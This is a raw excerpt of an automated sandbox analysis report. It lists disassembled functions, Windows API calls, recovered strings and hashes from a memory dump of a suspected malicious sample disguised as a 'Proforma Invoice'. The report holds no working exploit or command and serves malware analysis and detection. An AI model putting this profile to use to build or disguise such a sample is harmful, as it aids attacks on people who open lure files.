                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                • String ID: @
                                                                                                • API String ID: 3522835683-2766056989
                                                                                                • Opcode ID: 99ce03af5bb47904caef78356d7800800a1b52ef06304d3a7abc2da74a786999
                                                                                                • Instruction ID: d963af5ab312e38d692fcbde7da6c057a2c0d9622aec59d474b7c969124ead86
                                                                                                • Opcode Fuzzy Hash: 99ce03af5bb47904caef78356d7800800a1b52ef06304d3a7abc2da74a786999
                                                                                                • Instruction Fuzzy Hash: 20618F75A006199FCB14EF68C4819AEFBB6FF49310F14846DE856AB391CB34AD41CF94
                                                                                                APIs
                                                                                                • GetParent.USER32(?), ref: 00700F8C
                                                                                                • GetKeyboardState.USER32(?), ref: 00700FA1
                                                                                                • SetKeyboardState.USER32(?), ref: 00701002
                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00701030
                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 0070104F
                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00701095
                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007010B8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                • String ID:
                                                                                                • API String ID: 87235514-0
                                                                                                • Opcode ID: 04b363a979caceeb3f5f887136d842def06eca3be4b599514651b4e400b71a26
                                                                                                • Instruction ID: ee7c9653d592122cae8f878e826d9bdc736314c8982c5293759ae03566f90324
                                                                                                • Opcode Fuzzy Hash: 04b363a979caceeb3f5f887136d842def06eca3be4b599514651b4e400b71a26
                                                                                                • Instruction Fuzzy Hash: 615106606047D6BDFB3643348C49BBABEE96B06304F488689E1D4868C3C2DCECD5D751
                                                                                                APIs
                                                                                                • GetParent.USER32(00000000), ref: 00700DA5
                                                                                                • GetKeyboardState.USER32(?), ref: 00700DBA
                                                                                                • SetKeyboardState.USER32(?), ref: 00700E1B
                                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00700E47
                                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00700E64
                                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00700EA8
                                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00700EC9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                • String ID:
                                                                                                • API String ID: 87235514-0
                                                                                                • Opcode ID: 00f211470ae75e54d8dbae297d0b887ff00b99b67054475b4b25e289d5c45020
                                                                                                • Instruction ID: 628fb1a1f04ca4f7f9d23a0f32aea7f2fac3c21c52d7f5e8b91ac647592b2118
                                                                                                • Opcode Fuzzy Hash: 00f211470ae75e54d8dbae297d0b887ff00b99b67054475b4b25e289d5c45020
                                                                                                • Instruction Fuzzy Hash: D15106A06087D5BDFB329374CC45B7A7FE96B06310F088A99E1D4564C2C39DAC98E7A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcsncpy$LocalTime
                                                                                                • String ID:
                                                                                                • API String ID: 2945705084-0
                                                                                                • Opcode ID: f8fbd1649ebc36b7db4b36d016fe4cd414a5b0f71c821bf905b528295355af90
                                                                                                • Instruction ID: faf0c22b7be8a3eb217427ee1111c63c372bfb07969140802c62843095c59cab
                                                                                                • Opcode Fuzzy Hash: f8fbd1649ebc36b7db4b36d016fe4cd414a5b0f71c821bf905b528295355af90
                                                                                                • Instruction Fuzzy Hash: 2341D669C50218B6CB51EBB48C46EDFB7B9DF04310F50895EE508E3261FB34A645CBAE
                                                                                                APIs
                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006FD5D4
                                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006FD60A
                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006FD61B
                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006FD69D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                • String ID: ,,s$DllGetClassObject
                                                                                                • API String ID: 753597075-747432728
                                                                                                • Opcode ID: efbdc267f14b287ae8981147b7c7249a4ea6bb11d9fa562d3483f80545a9d0a1
                                                                                                • Instruction ID: ab152bcc4b707af61860b932b8b6bae67e276c9279aeb03297c3813faf1cae1b
                                                                                                • Opcode Fuzzy Hash: efbdc267f14b287ae8981147b7c7249a4ea6bb11d9fa562d3483f80545a9d0a1
                                                                                                • Instruction Fuzzy Hash: 3F4160B1600208EFDB15DF54C884AAA7BBBEF44310F1581ADEE09DF205D7B5E945CBA4
                                                                                                APIs
                                                                                                  • Part of subcall function 0070466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00703697,?), ref: 0070468B
                                                                                                  • Part of subcall function 0070466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00703697,?), ref: 007046A4
                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 007036B7
                                                                                                • _wcscmp.LIBCMT ref: 007036D3
                                                                                                • MoveFileW.KERNEL32(?,?), ref: 007036EB
                                                                                                • _wcscat.LIBCMT ref: 00703733
                                                                                                • SHFileOperationW.SHELL32(?), ref: 0070379F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                • String ID: \*.*
                                                                                                • API String ID: 1377345388-1173974218
                                                                                                • Opcode ID: 77e4f2e02e8dadb11873a0a3612ae86e1abf6b240676855fd3a9ecc6a08d54c4
                                                                                                • Instruction ID: 381a5f96778402eb2b0877de5171f35381a4de646ee3d4090d9734356a155030
                                                                                                • Opcode Fuzzy Hash: 77e4f2e02e8dadb11873a0a3612ae86e1abf6b240676855fd3a9ecc6a08d54c4
                                                                                                • Instruction Fuzzy Hash: 19418EB1508344EEC751EF64C445ADFB7ECEF89380F404A2EF49AC3291EA39D6898756
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 007272AA
                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00727351
                                                                                                • IsMenu.USER32(?), ref: 00727369
                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007273B1
                                                                                                • DrawMenuBar.USER32 ref: 007273C4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                • String ID: 0
                                                                                                • API String ID: 3866635326-4108050209
                                                                                                • Opcode ID: cf2b35d2fd518331ce9f8559fced839c3e4d9db69236fc34c3a6d4e3d651a55a
                                                                                                • Instruction ID: ea64e27c1b099c50d477e1f52e6fc00bcbe0ce6d26a9eef8fda4c1c905ea1a3e
                                                                                                • Opcode Fuzzy Hash: cf2b35d2fd518331ce9f8559fced839c3e4d9db69236fc34c3a6d4e3d651a55a
                                                                                                • Instruction Fuzzy Hash: 1B414771A04249EFDB24DF50EA84A9ABBF8FB08310F148429FD0597251C738AD10EF90
                                                                                                APIs
                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00720FD4
                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00720FFE
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 007210B5
                                                                                                  • Part of subcall function 00720FA5: RegCloseKey.ADVAPI32(?), ref: 0072101B
                                                                                                  • Part of subcall function 00720FA5: FreeLibrary.KERNEL32(?), ref: 0072106D
                                                                                                  • Part of subcall function 00720FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00721090
                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00721058
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                • String ID:
                                                                                                • API String ID: 395352322-0
                                                                                                • Opcode ID: e7c2db1bbe2aa42aec46120c372143cc4b87a7d28041ee6cff7be75d79cd8363
                                                                                                • Instruction ID: 3b107621faa643c08f137df43f5db5446eaad96fee860989d1e7b784e1c8687f
                                                                                                • Opcode Fuzzy Hash: e7c2db1bbe2aa42aec46120c372143cc4b87a7d28041ee6cff7be75d79cd8363
                                                                                                • Instruction Fuzzy Hash: 00310C71901119BFDB25DF90EC89EFFB7BCEF18300F404179E501A2151EA789E859AA4
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007262EC
                                                                                                • GetWindowLongW.USER32(011A5670,000000F0), ref: 0072631F
                                                                                                • GetWindowLongW.USER32(011A5670,000000F0), ref: 00726354
                                                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00726386
                                                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007263B0
                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 007263C1
                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007263DB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: LongWindow$MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 2178440468-0
                                                                                                • Opcode ID: 51aabb1eaf17c2c2e28b9c30bfadcb21cbd65c03c54b37cd5910684f4414f4e6
                                                                                                • Instruction ID: c0b02622f20cfcbf40f80730030d0c7f12a2086bec5184417068719a27c54e91
                                                                                                • Opcode Fuzzy Hash: 51aabb1eaf17c2c2e28b9c30bfadcb21cbd65c03c54b37cd5910684f4414f4e6
                                                                                                • Instruction Fuzzy Hash: 1E311330640261EFDB20CF18EC84F5537E1FB4A714F1981A9F5419F2B2CB79A840DB94
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006FDB2E
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006FDB54
                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 006FDB57
                                                                                                • SysAllocString.OLEAUT32(?), ref: 006FDB75
                                                                                                • SysFreeString.OLEAUT32(?), ref: 006FDB7E
                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 006FDBA3
                                                                                                • SysAllocString.OLEAUT32(?), ref: 006FDBB1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                • String ID:
                                                                                                • API String ID: 3761583154-0
                                                                                                • Opcode ID: 68c1f5f54ff0df2810f9bd65344d3c59ad75ce4c1d78fdc4d453a9037e2e2f6d
                                                                                                • Instruction ID: 228339fe0421896581835a34639d203ff38325cdd1d1322af71b1d35a2391549
                                                                                                • Opcode Fuzzy Hash: 68c1f5f54ff0df2810f9bd65344d3c59ad75ce4c1d78fdc4d453a9037e2e2f6d
                                                                                                • Instruction Fuzzy Hash: 2B21977660021DAFDF10EFA8DC88DFB73AEEB09360B018575FA14DB290D674AC428764
                                                                                                APIs
                                                                                                  • Part of subcall function 00717D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00717DB6
                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007161C6
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 007161D5
                                                                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0071620E
                                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00716217
                                                                                                • WSAGetLastError.WSOCK32 ref: 00716221
                                                                                                • closesocket.WSOCK32(00000000), ref: 0071624A
                                                                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00716263
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                • String ID:
                                                                                                • API String ID: 910771015-0
                                                                                                • Opcode ID: d51aff5aef9584231811f0d792142a068f4f641a236dca260c4e531d3c9acd8b
                                                                                                • Instruction ID: eafe45ae2b9d66a74af97c1bba4b2be90ac3319caea6f14e244a5db907d408b8
                                                                                                • Opcode Fuzzy Hash: d51aff5aef9584231811f0d792142a068f4f641a236dca260c4e531d3c9acd8b
                                                                                                • Instruction Fuzzy Hash: BD31A131600108ABDF10AF28CC85BFE77B9EB45720F048029FD05A72D1CB78AC45DBA5
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsnicmp
                                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                • API String ID: 1038674560-2734436370
                                                                                                • Opcode ID: 5c8982b41237ff094294e33dbeb83f73e6235b313cf6783b1a6cf9fd7b8ad71d
                                                                                                • Instruction ID: 61fcf725dd1867bb725d874103ba59ea1479cda24004b2ed14a4990f86f0e168
                                                                                                • Opcode Fuzzy Hash: 5c8982b41237ff094294e33dbeb83f73e6235b313cf6783b1a6cf9fd7b8ad71d
                                                                                                • Instruction Fuzzy Hash: 9C2107B2208525AAD220BB34BC02FF7B39BDF56354F14443DFA45C6292EB919D42C2A9
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006FDC09
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006FDC2F
                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 006FDC32
                                                                                                • SysAllocString.OLEAUT32 ref: 006FDC53
                                                                                                • SysFreeString.OLEAUT32 ref: 006FDC5C
                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 006FDC76
                                                                                                • SysAllocString.OLEAUT32(?), ref: 006FDC84
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                • String ID:
                                                                                                • API String ID: 3761583154-0
                                                                                                • Opcode ID: 78eec2e56326f4adda09fbec64423f91707e17fad6204944257a74b7459f5aac
                                                                                                • Instruction ID: 8b00de8a06c6d1e3d2c5f440573b8fa0a822e54d766b6ed4251c8d7d8ae5e120
                                                                                                • Opcode Fuzzy Hash: 78eec2e56326f4adda09fbec64423f91707e17fad6204944257a74b7459f5aac
                                                                                                • Instruction Fuzzy Hash: 00215675604209AF9B10EFA8DC89DBB77EEEB09360B10C135FA15CB261D6B4EC42C764
                                                                                                APIs
                                                                                                  • Part of subcall function 006A1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 006A1D73
                                                                                                  • Part of subcall function 006A1D35: GetStockObject.GDI32(00000011), ref: 006A1D87
                                                                                                  • Part of subcall function 006A1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 006A1D91
                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00727632
                                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0072763F
                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0072764A
                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00727659
                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00727665
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                                • String ID: Msctls_Progress32
                                                                                                • API String ID: 1025951953-3636473452
                                                                                                • Opcode ID: ecdad383cc2e153f7fd226bb4ea4e1d8995f3218b80f1dee664e99128bf4e50d
                                                                                                • Instruction ID: 96474a6949924a12e77dcf7beaf75fd24f3570789ba256fc953ad8cf5b0dad36
                                                                                                • Opcode Fuzzy Hash: ecdad383cc2e153f7fd226bb4ea4e1d8995f3218b80f1dee664e99128bf4e50d
                                                                                                • Instruction Fuzzy Hash: 7611B2B2110229BFEF159F64DC85EE77F6DEF08798F014114FA04A60A0CB76AC21DBA4
                                                                                                APIs
                                                                                                • __init_pointers.LIBCMT ref: 006C9AE6
                                                                                                  • Part of subcall function 006C3187: EncodePointer.KERNEL32(00000000), ref: 006C318A
                                                                                                  • Part of subcall function 006C3187: __initp_misc_winsig.LIBCMT ref: 006C31A5
                                                                                                  • Part of subcall function 006C3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006C9EA0
                                                                                                  • Part of subcall function 006C3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 006C9EB4
                                                                                                  • Part of subcall function 006C3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 006C9EC7
                                                                                                  • Part of subcall function 006C3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 006C9EDA
                                                                                                  • Part of subcall function 006C3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 006C9EED
                                                                                                  • Part of subcall function 006C3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 006C9F00
                                                                                                  • Part of subcall function 006C3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 006C9F13
                                                                                                  • Part of subcall function 006C3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 006C9F26
                                                                                                  • Part of subcall function 006C3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 006C9F39
                                                                                                  • Part of subcall function 006C3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 006C9F4C
                                                                                                  • Part of subcall function 006C3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 006C9F5F
                                                                                                  • Part of subcall function 006C3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 006C9F72
                                                                                                  • Part of subcall function 006C3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 006C9F85
